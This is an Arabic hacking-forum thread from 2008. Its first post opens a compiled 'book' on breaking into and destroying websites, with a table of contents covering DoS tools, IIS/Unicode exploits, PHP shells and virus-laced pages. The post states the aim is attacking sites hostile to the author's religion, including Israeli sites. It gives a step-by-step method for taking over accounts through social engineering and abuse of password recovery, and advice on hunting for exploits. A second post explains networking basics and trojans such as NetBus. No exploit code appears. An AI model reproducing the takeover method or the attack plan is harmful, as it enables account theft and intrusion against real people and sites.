.:: منتديات العاصفة ::.  

العودة   .:: منتديات العاصفة ::. > أنظمة التشغيل والخوادم > مملكة أمن المواقع والشبكات

موضوع مغلق
 
أدوات الموضوع انواع عرض الموضوع
قديم 16-02-2008, 01:49   #1
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
إبتسامة إختراق من الألف إلى الياء

بسم الله الرحمن الرحيم

الحمد لله رب العالمين الرحمن الرحيم والصلاة والسلام على أشرف الأنبياء
والمرسلين نبينا محمد عليه أفضل الصلاة وأتم التسليم،
أما بعد...

ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون

مرجعاً لإخواني وأخواتي المسلمين، ففي هذا الكتاب سأقوم بنقل كل ما

كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية

الإختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف،،،

وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب.


ملاحظة: مواضيع هذا الكتاب ليس من تأليفي إنما هي نقلاً عن اخواني

المسلمين.

اقرأ هذا اولاً قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي العظيم

الذي رفع السماء بلا عمد ألا اقوم بتطبيق ما في هذا الكتاب من طرق

على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"

والله الموفق،،،

المحتويات
1. المقدمة.
2. الفهرس.
3. مقدمة عامة عن الهاكر.
4. كيفية البحث في الإنترنت.
5. مفاهيم خاصة بشبكات الإنترنت (الجزء الأول).
6. مفاهيم خاصة بشبكات الإنترنت (الجزء الثاني).
7. الأمن عبر الإنترنت.
8. أمن الشبكات.
9. مصطلحات مهمة للمبتدئين في اختراق المواقع.
10. اختراق المواقع للمبتدئين.
11. الإختراق ببرنامج .Webcrack
12. الإختراق ببرنامج .MungaBunga
13. برنامج تدمير المواقع WinSmurf.
14. شرح برنامج Evil Ping لتدمير المواقع.
15. برنامج الدرة لتدمير المواقع.
16. تدمير المواقع بدون برامج.
17. التلنت.
18. معلومات عن DNS.
19. معلومات عن Routing in the Internet.
20. NETBIOS.
21. بروتوكول خدمة Finger.
22. Net شرح مختصر لإدارة الشبكة بإستخدام الامر.
23. شرح الـ.secure shell
24. شرح معنى الـ .Buffer Overflows
25. الـCGI وعلاقتها بالإنترنت.
26. كيف تحمي نفسك وتخفي أفعالك؟!.
27. كيف تبقى مجهول الهوية في النت (الجزء الأول)؟؟.
28. كيف تبقى مجهول الهوية في النت (الجزء الثاني)؟؟.
29. برنامج HTTP Port الذي يجعلك تتصفح النت متخفيا!!ً.
30. شرح برنامج .NeoTrace
31. كيفية القيام بجمع المعلومات عن موقع أو شبكة.
32. برنامج عمران سكان للبحث عن الثغرات.
33. الإختراق عن طريق اليونيكود (الجزء الأول).
34. الإختراق عن طريق اليونيكود (الجزء الثاني).
35. معلومات عامة عن كيفية الاستفادة من ثغرات اليونيكود.
36. الدليل الكامل لإختراق سيرفر IIS.
37. دراسة مفصلة وبعمق في الـ .UniCode
38. تدريب على عملية الإختراق بواسطة اليونيكود.
39. شرح مفصل لكيفية اختراق المواقع المجانية.
40. درس مفصل عن الكوكيز.
41. شرح برنامج الأسطورة God Willفي تلغيم الصفحات.
42. وداعاً للبرنامج الأسطورة ومرحبا ببرنامج NOOP4.
43. معلومات مهمة عن المواقع التي تدعم الفرونت بيج.
44. اختراق المواقع التي تدعم الفرونت بيج.
45. الإختراق العشوائي.
46. الطريقة الصحيحة والمثلى في اختراق المواقع.
47. نبذه يسيرة ومبسطة عن كيفية اختراق المواقع.
48. (<س&ج>) في اختراق المواقع للمبتدئين.
49. برنامج CgiScaner للبحث عن الثغرات.
50. شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع.
51. شرح برنامج Shadow Scan Security لتحليل الموقع.
52. اماكن وجود ملف الباسورد في أنظمة التشغيل.
53. اختراق الموقع (الجزء الأول).
54. اختراق المواقع (الجزء الثاني).
55. اختراق المواقع (الجزء الثالث).
56. درس في اختراق المواقع (متوسط).
57. شرح ملف htaccess.
58. نظام نقل الملفات .FTP
59. الإختراق عن طريق .FTP
60. اختراق الـSQL.
61. درس مفصل عن الـ.SQL
62. درس لإحتراف الهاك في اختراق المواقع.
63. استغلال لينكس في اختراق المواقع.
64. درس اخر في اختراق المواقع عن طريق لينكس.
65. شرح مفصل من الألف إلى الياء في احتراف اختراق المواقع عن طريق لينكس.
66. درس عن الـPHP Shell (الجزء الأول).
67. درس عن الـPHP Shell (الجزء الثاني).
68. درس عن الـPHP Shell (الجزء الثالث).
69. شرح أداة anmap.
70. طريقة لإقتحام السيرفرات بدون ثغرات.
71. Cross Site Scripting.
72. كود تدمير سجل الزوار.
73. وضع فايروس في صفحة.
74. الثغرااات.
75. شرح شبه مفصل عن الثغرات.
76. كيف تستخدم الثغرات.
77. تمتع بإختراق المواقع الإسرائيلية مع هذه الثغرة.
78. ثغرة نيوك.
79. ثغرة Chunked.
80. حماية المنتديات.
81. اختراق المنتديات من نوع vBulletin2,2,0.
82. درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها.
83. ثغرة في منتدياتvBulletin 2,2,9.
84. اختراق منتديات phpbb 2.0.0.
85. ثغرة في php nuke .
86. أفضل المنتديات والمواقع العربية للهاك.
87. أفضل مواقع الأمن والهاك الإنجليزية.
88. الخاتمة.


"من هم الهاكر "
الهكرز هم اشخاص مخترقون لأجهزة الغير بمساعدة احدى برامج الاختراق المشهورة إعتمادً على برامج مساندة تسهل عملية الاتصال بين الحاسبين تسمى بالباتش اوالسيرفر.
كيف يتم اختراق مواقع الإنترنت؟؟-
هذا السؤال الذي دفع الكثيرين الي البحث والابحار في عالم النت
هناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية
النوع الاول

سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية
السرية التي لا يعلمها الا انت مثل
اسمك الحقيقي الكامل
عمرك وميلادك
من اي بلد انت
وتختلف الدقة من سيرفر الي سيرفر آخر
النوع الثاني

سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب عليه
((نسيت الباسوورد))
ومن ثم يرسلون الباسوورد الي الايميل الخاص بك
.................................................. .................
هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما ان تعرف بياناته
الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال البايانات الخاصة
ومن ثم تغيير الباسوورد ...
وتغيير بيانات صاحب الصفحة الخاصة والسرية
..........................

النوع الثاني

هذا النوع مهما حاولت سرقة الباسوورد فانك لاتستطيع ان تمتلك الصفحة لمدة طويلة لان الشركة سوف ترسل اليه الباسوورد
الجديد .. ومن هنا سيعرف الباسوورد ورقمه الجديد ..
وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري !!!
اذا كيف الحل ؟؟ ((
الحل هو ..
ان تعرف باسوورد الايميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيت الباسوورد للموقع
فسيتم اخطارك علي الايميل الذي سرقته .. بالباسوورد للموقع ..
ومن هنا يمكنك سرقتة وملكيته وانت بسلام.
انتهى،،،


"كيفية البحث في الإنترنت"

<منقول من منتديات شبكة الحزم الإسلامية>
<الكاتب: بلاك هنتر >
كيفية البحث في الانترنت ؟
عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في الانترنت ونريد البحث عنها كيف يتم ذلك ؟؟
غالبا نجد ان الشباب لا يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في الانترنت ؟ وقد تجده يبحث ولكن لا يحصل بنتيجه والخطأ ليس في البحث
بل في طريقة البحث


صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم ان محركات البحث لكل منها عمل مع العلم انها عامه ولكن
ما هي النتائج ؟؟

بالنسبه مثلا للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الاولى وهي غالبا التي تريدها
بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريد والتي يتعامل معها المحرك ثم المواقع التجاريه التي لا يتعامل
معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا

اعتقد ان المسئله وضحت

يا اخوان انا ابغى ابحث عن برنامج ما مثلا يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل لازم انت تتعلم كيف تبحث
وش الفرق بينك وبين الانسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ لا اعتقد ذلك
هل الانترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا لا اعتقد ذلك مع العلم ان السرعات العاليه اثبتت فشلها بالنسبه لبعض الاشخاص
التي لا تعرف كيف توظف عقولها

كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي والله يا اخ بلاك انا الان لي سنه كامله على الانترنت
مع خط ISDN غير محدد بباندويث وبسرعة 256 ولا اعرف من برامج الاختراق غير الهاك اتاك

فعلا انا تحطمت سنه كامله ومعك القوه الضاربه هذه ولا تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بين مواقع الاغاني والافلام والداون لود لها والشات قال ايوالله هذا هو انا
وبذلك فعلا ايقنت ان السرعه ليست كل شيء

اهم شي عقلية من يملك السرعه فالسلاح الذي لا تستطيع استخدامه - لا ينفع إختراق الألف الياء - ا هـ.

الان سنقوم بشرح كيفية التخطيط للبحث :

طريقه بسيطه جدا وهي عبر تقسيم المواقع

مواقع تجاريه
مواقع برامج (( ويندوز - ليونكس ))
مواقع ملتيميديا
مواقع سياسيه واخباريه
مواقع هاك
مواقع كراك
مواقع سكيوريتي
مواقع هاردوير
منتديات
محرك بحث جوجل (( هذا لوحده عالم ))
مواقع ..... الخ

الان لنأخذ ما نبحث عنه

مثلا برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثلا في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟ او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟
خلاص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت - ويب اتاك - داون لود - وغيرها وبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز
وهو موقع فريش ميت (( اخر الموضوع ساضع كل تلك المواقع كمرجع ))

بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ لا لم ينتهي بعد اذهب الى الجوجل وابحث عن ما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه
واذا وجدت ما تريد ادخل اليها

لم تجد ؟؟ (( ما اعتقد انك ما هتلاقي اللي تدور عليه انا عمري ما سويت هالطريقه الا واجد ما اريد )) ولكن لنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث
قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى

هذه نقطه نقطة اخرى مثلا انت منت عارف اللي انت تبحث عنه بالظبط

مثلا انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وش
ولتكن مثلا ثغرات الـ Cross Site Scripte واللي اختصارها XSS او CSS
انا ما ادور على الثغره ادور على اكسبلويت مثلا وش اسوي ؟؟؟
اذهب اولا لمواقع السكيوريتي ابحث عن كلمة XSS هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس الوقت اذهب الى الجوجل مثلا وابحث عن
XSS ولكن هذا لا يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط لا الجوجل هيجيب بلاوي ولذلك علي بتحديد البحث عبر علامه ( + )

يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتب :
XSS+BUG+EXPLOIT
مثلا ادور ثغرات IIS هاكتب :
IIS+exploit+bug

خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه

ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد

اهم شي بالنقطه التخطيط للبحث

عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز والا ليونكس ؟ رتب المواقع : ابدا البحث
عن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع : ابدا البحث
وهكذا

الان ساضع لكم مجموعه من المواقع تفيدكم جدا

الملك جوجل : http://www.google.com/

محركات بحث عاديه ومتقدمه : http://www.yahoo.com/ - http://www.altavista.com/ - http://www.lycos.com/ - http://hotbot.lycos.com/

مواقع ملتيميديا : (( عبر برامجها مثثل الكازا او المورفيس او اوديو جالاكسي او وين ام اس )) kazaa - WinMX الاكثر شهره

مواقع سياسيه واخباريه : http://news.bbc.co.uk/hi/arabic/news - http://arabic.cnn.com/ - http://www.aljazeera.net/

مواقع سكيوريتي : http://www.securiteam.com/ - http://www.securityfocus.com/ - http://www.ussrback.com/ - http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ - http://www.ntsecurity.com/

مواقع هاردوير : http://nvidia.com/ - http://www.asus.com/ - http://drivers.on-line.net.nz/ - http://intel.com/ - http://www.amdmb.com/

انتهى،،،

يتبع ...
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 01:51   #2
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
"مفاهيم خاصة بشبكات الأنترنت (الجزء الأول)"
<منقول>
<الكاتب: عصام الوقيت >
الإنترنت عالم مليء بالفائدة، مليء بالمتعة، عالم يجد فيه كل إنسان ما يهمه، باختلاف مجالات الاهتمام واختلاف الأشخاص. ولكن على الرغم من كثرة الأشياء المفيدة في الإنترنت إلا أنه لابد من وجود ما يكدر الصفو. هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الأحيان.
من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة لا بد أنها دارت في رأس أكثر المستخدمين في مختلف أنحاء العالم، ولا سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من أجهزتهم أو إتلاف محتوياتها أو في أهون الأحوال إخافتهم وإرعابهم.
الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ، كوسيلة تعليمية لكل المستخدمين على مختلف مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلاء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز لإلحاق الأذى بهم. باختصار ستكون أخي القارئ أحد هؤلاء الهاكرز، ولكن لن تكون مثلهم في الشر..بل ستكون الهاكر الطيب.

مقدمة:
هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الأساسية التي يجب أن يعرفها كل من يريد اتقاء شر الهاكرز، وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب الآلي.

رقم IP
ما الغرض من بطاقة الأحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك. فالرقم الموجود على بطاقتك يستحيل تكراره لأي مواطن آخر في نفس البلد.
نفس المبدأ ينطبق في مجال الحاسب الآلي من ناحية الشبكات، فلتمييز الأجهزة المرتبطة بشبكة واحدة يعطى لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان الجهاز أو IP.
في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلاك الشبكة، يكون هذا الرقم ثابتا للجهاز دائما. مالم يتم نزع الجهاز من الشبكة بشكل دائم، ولكن في حالة الاتصال الهاتفي فإن عنوان الجهاز يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلاله.
لعلك الآن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالانترنت؟ الأمر سهل جدا من شريط المهام في الوندوز انقر على Start ثم run ثم أدخل winipcfg. إذا كنت تستخدم وندوز باعتماد اللغة العربية اختر "ابدأ" ثم "تشغيل" ثم اكتب winipcfg.

توزيع أرقام الـ IP
هل سبق وأن تساءلت لماذا كان رقم IP الخاص بك هو 212.33.40.1 وليس 24.5.66.3، وهل سبق وأنت تساءلت لماذا تبدأ ارقام الـIP في السعودية بالرقم 212 وليس بأي رقم آخر ؟ في الحقيقة إن أرقام IP لايتم توزيعها بطريقة عشوائية أو بطريقة "كلٌ يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف على توزيع أرقام IP على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم IP الذي تمتلكه.
تشرف منظمة IANA(Internet Assigned Numbers Authority) على توزيع أرقام IP على مستوى العالم، حيث أنها تقوم بالإشراف على ثلاث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء معين من العالم وهذه المنظمات الفرعية هي:
1- منظمة ARIN (American Registry for Internet Numbers) وتشرف على أمريكا الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا
2- منظمة RIPE (Réseaux IP Européens) وتشرف على منطقة أوروبا والشرق الأوسط وأجزاء من افريقيا
3- منظمة APNIC (Asia Pasific Network Information Center) وتشرف على آسيا

تقوم كل منظمة بالإشراف على توزيع ارقام IP للدول الواقعة تحت مجال اشرافها. ويوجد لكل منظمة قاعدة بيانات تمكنك من معرفة صاحب رقم IP معين وتسمى هذه الخدمة بخدمة whois حيث تقوم بإدخال رقم IP التابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا IP فمثلا لمعرفة صاحب رقم IP معين في المملكة العربية السعودية قم بالذهاب للموقع http://www.ripe.net/db/whois.html وأدخل رقم IP وستحصل على معلومات متكاملة عن صاحب هذا الرقم.

عائلة الـIP
من المعروف أن رقم الـIP يتكون من أربعة أقسام كالتالي 10.10.10.1 كل قسم من هذه الأقسام يمكن أن تكون له قيمة تتراوح بين 0 و 255 (مع وجود بعض الاستثناءات التي ليس هذا المجال لذكرها) الشيء الذي يجب معرفته أن أول ثلاثة أقسام من الجهة اليسرى من رقم IP غالبا ما تكون محجوزة لمزود خدمة معين بحيث تكون جميع أرقام الIP التي يتشابه بها أول ثلاثة أقسام من الجهة اليسرى تنتمي لنفس مزود الخدمة. فمثلا الجهاز الذي يحمل رقم IP 212.26.75.34 والجهاز الذي يحمل رقم IP 212.26.75.201 غالبا ما ينتميان لنفس مزود الخدمة.
ولمعرفة مزود الخدمة بواسطة رقم IP الثلاثي (أي رقم IP بدون آخر رقم من الجهة اليمنى ) يمكنك زيارة موقع المنظمة المشرفة على البلد الذي ينتمي له رقم IP واستخدام خدمة whois الخاصة بها. فمثلا، لمعرفة مزود الخدمة في المثال أعلاه قم بالذهاب للموقع http://www.ripe.net/db/whois.html وأدخل الرقم 212.26.75 في المربع الموجود في الصفحة ومن ثم انقر الزر search وستحصل على جميع المعلومات المخزنة عن مزود الخدمة.
المنفذ Port
ماهو المنفذ ؟ تخيل منزلا فيه العديد من الأبواب وأن كل واحد من هذه الأبواب مخصص لخدمة معينة ، فباب لاستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات.نفس المبدأ ينطبق على الحاسب الآلي فالجهاز يحتوي على العديد من الخدمات مثل خادم الويب web server وخادم الملفات ftp server وغيرها. فكل تطبيق لديه منفذ معين يستخدمه لارسال واستقبال بياناته وهذا نوع من التنظيم فمثلا خدمة الويب غالبا ما تكون على المنفذ 80 وخدمة الملفات تكون على المنفذ 21 وبرنامج النت ميتنغ يكون على عدة منافذ منها 1720 وكل تطبيق يكون له منفذ معين. فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف يعرف الجهاز لأي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها.

DNS ماهو ؟
أنت بالطبع تتذكر أسماء أصدقائك ولا تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها وإن فعلت فتبقى الحقيقة أن نسيان الأرقام أكثر سهولة من نسيان الأسماء. من هذا المبدأ جاءت فكرة DNS. حيث أنه في بداية استخدام الانترنت كان من المفروض أن تحفظ عنوان الجهازIP لكل موقع .. فمثلا لزيارة موقع CNN يجب أن تكتب 207.145.53.10 بدلا من www.cnn.com ومن ثم لاحظ خبراء الحاسب أن ذلك سيكون صعبا جدا .. فالذاكرة البشرية غير قادرة على حفظ الكثير من الأرقام ومن هنا تم التوجه للـ DNS وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الأجهزة وأرقام IP الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود DNS ليرد عليهم بعنوانه (رقم IP الخاص به) فلتدخل على موقع www.cnn.com يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها لخادم الاسماء DNS والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم الويب الخاص بشبكة سي ان ان... اختصارا، يمكن القول بأن خادم الأسماء DNS ماهو الا جهاز يحتوي على قاعدة بيانات فيها اسماء الاجهزة في الانترنت وأرقام IP الخاصة بها.

الأمر netstat
هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في الإنترنت بدون أن يكون لدى كل من الجهازين رقم الـIP الخاص بالجهاز الآخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات. هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف عنوانك لكي يقوم بالرد عليك. بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها. في نظام الشبكات يسمى هذا التخاطب بالاتصال connection. طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب الاتصال ويسمى عميل أو Client ويكون هناك أيضا من يتم الاتصال عليه ويسمى مزود server.
هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الأجهزة المتصلة بجهازك ( أو التي يقوم جهازك بارسال واستقبال البيانات منها) ومعرفة المتفذ (port) الذي تم عليه الاتصال( فائدة المنفذ هي تحديد التطبيق الذي تم الاتصال عليه) وهذا الأمر هو الأمر netstat ما عليك إلا أن تقوم بتشغيل ms-dos prompt من قائمة برامج programs ومن ثم اكتب هذا الأمر وستحصل على قائمة بكل هذه الأجهزة مع المنفذ الذي تم عليه الاتصال في كلا الجهازين.

المحادثة (IRC) Internet Relay Chat
طريقة عمل نظام المحادثة هي وجود مزود محادثة chat server ووجود برنامج محادثة chat client في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ، والذي بدوره يقوم بالاتصال بمزود المحادثة. وبعد إجراء الاتصال يتمكن الشخص من الدخول لأي من الغرف الموجودة في المزود كما يمكنه أيضا انشاء الغرف الخاصة به، كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذا المجال لذكرها.
قلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـIP الخاص بك، ولكن يجب أن لا يفهم هذا الكلام بالشكل الخاطيء فمثلا في نظام المحادثة IRC تقوم أنت بالاتصال بمزود المحادثة chat server وكذلك الحال بالنسبة لجميع المستخدمين، بحيث يكون هذا المزود كالوسيط بينك وبين جميع الأشخاص المتصلين به، فلكي تقوم بإرسال رسالة لشخص ما، يقوم برنامج المحادثة بإرسال الرسالة لمزود المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه لا يوجد اتصال مباشر بينك وبين أي شخص آخر خلال نظام المحادثة، ولها تلاحظ أن برامج المحادثة غالبا ما تعطيك رقم IP للأشخاص الآخرين ناقصا (بالشكل التالي 111.222.333.XXX ) وهذا فيه نوع من الحماية للمستخدمين حتى لا يتمكن الهاكرز من معرفة رقم الـIP الكامل للمستخدم ومن ثم استخدامه للوصول إليه.

هناك استثناءان لهذا النظام، حيث يمكن لأي شخص آخر في نظام المحادثة معرفة رقم IP الكامل الخاص بك, وهما كالتالي:
1. في حالة كون الشخص مشرفا على الغرفة التي دخلت بها (المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلاحية من قبل من أنشأ الغرفة)، حيث أن المشرف يحصل على رقم الـ IP الكامل لكل شخص دخل غرفته.
2. في حالة تبادلك الملفات مع شخص في نظام المحادثة: فمزود المحادثة يقوم بدور الوسيط في نقل النصوص فقط، أما في حالة نقل الملفات فإنه يقوم بإعطاء كلا الجهازين رقم الـIP الخاص بالجهاز الآخر بحيث يقومان بنقل البيانات بينهما بشكل مباشر.
مما ذكر أعلاه، احذر من الدخول للغرف التي تكون مخصصة للهاكرز، حيث أنه المشرف (وهو هاكر في الغالب) سيحصل على رقم IP الخاص بك مباشرة مما يعرض جهازك لخطر الاختراق. وأيضا احذر من استقبال الملفات ممن لا تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب، لأن غرضه الوحيد ربما يكون الحصول على رقم الآي بي الخاص بك.

من صاحب الموقع ؟
لابد أنك قد زرت موقعا وأعجبك، وتساءلت في نفسك من هو صاحب هذا الموقع (سواء كان شخصا أو مؤسسة) لا داعي لأن تحتار بعد الآن فيكفي أن تذهب للموقع www.networksolutions.com/cgi-bin/whois/whois/ وتقوم بإدخال اسم الموقع من دون www ( مثل wagait.com )وستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي ورقم هاتفه والفاكس وغيرها من المعلومات الأخرى المتعلقة بالموقع. بالطبع فهذه المعلومات قد قام صاحب الموقع بإدخالها عندما قام بحجز اسم الموقع.
إنتهى .




"مفاهيم خاصة بشبكات الإنترنت (الجزء الثاني)"
لكي تعرف كيف تحمي نفسك من أي خطر يجب أولا أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن تعرف كيف تحمي نفسك من هذا الخطر، فمثلا لكي نحمي أنفسنا من اللصوص، يجب أن نعرف خطرهم. ومن ثم يجب أن نعرف كيف نتقي شرهم، فنحن نقفل الأبواب لمعرفتنا أن اللصوص قد يدخلون منها في حال تركناها مفتوحة. كذلك هو الحال بالنسبة للحاسب الآلي، فلكي تعرف كيف تحمي نفسك من شرور الهاكرز، يجب أن تعرف كيف يقومون باختراق جهازك، وما هي الأبواب التي يدخلون منها إلى أجهزتنا.

في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات، والتي تساعدك على معرفة ما سنتحدث عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين (الهاكرز) من القيام بعملية الاختراق لأجهزة المستخدمين لشبكة الإنترنت، سواء كان هذا الاختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب ومسح الملفات. بالطبع فإننا سنلمح لهذه البرامج تلميحا، ولن نذكر أسماءها وذلك حتى لا يتم إساءة استغلالها.

1- الفيروسات (Viruses):
عندما يتم التحدث عن الأخطار الموجودة في الحاسب الآلي، تتوجه أذهان المستمعين تلقائيا للتفكير في الفيروسات، نظرا لانتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب الآلي. ولعله من المناسب عدم
الإطالة في الحديث عن الفيروسات، فالغالبية (إن لم يكن الكل) يعرفون خطرها وتأثيرها على أجهزة المستخدمين.

2- التروجان (Trojans):
التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى (غالبا مخربة) بدون علم المستخدم. وقد انتشرت هذه النوعية بكثرة في الإنترنت، نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من إمكانيات تصل في بعض الأحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية.
لعل من أشهر التروجان المنتشرة في الإنترنت التروجان المسماة بـ "نت باس" NetBus و" باك اوريفيس " Back Orifice و "سب سيفين " SubSeven . وطريقة عملها متشابهة وهي أن يقوم المخترق بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الآخرون بسحبها ظنا منهم بأن هذه الملفات تقوم بوظائف مفيدة لهم، وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان داخل جهازه بحيث يتمكن المخترق (باستخدام برنامج عميل للتروجان client) من التحكم في جهاز المستخدم الضحية.
تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها، وتتراوح خطورة الوظائف من التجسس على الجهاز ( مثل سرقة الملفات والبريد الإلكتروني وكلمات السر المختلفة) حتى العبث بجهاز المستخدم بإخراج الأقراص المضغوطة (CD-ROM) أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف صوت وغيرها من الوظائف الأخرى المزعجة.

صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها

3- المشاركة في الطباعة والملفات في ويندوز:
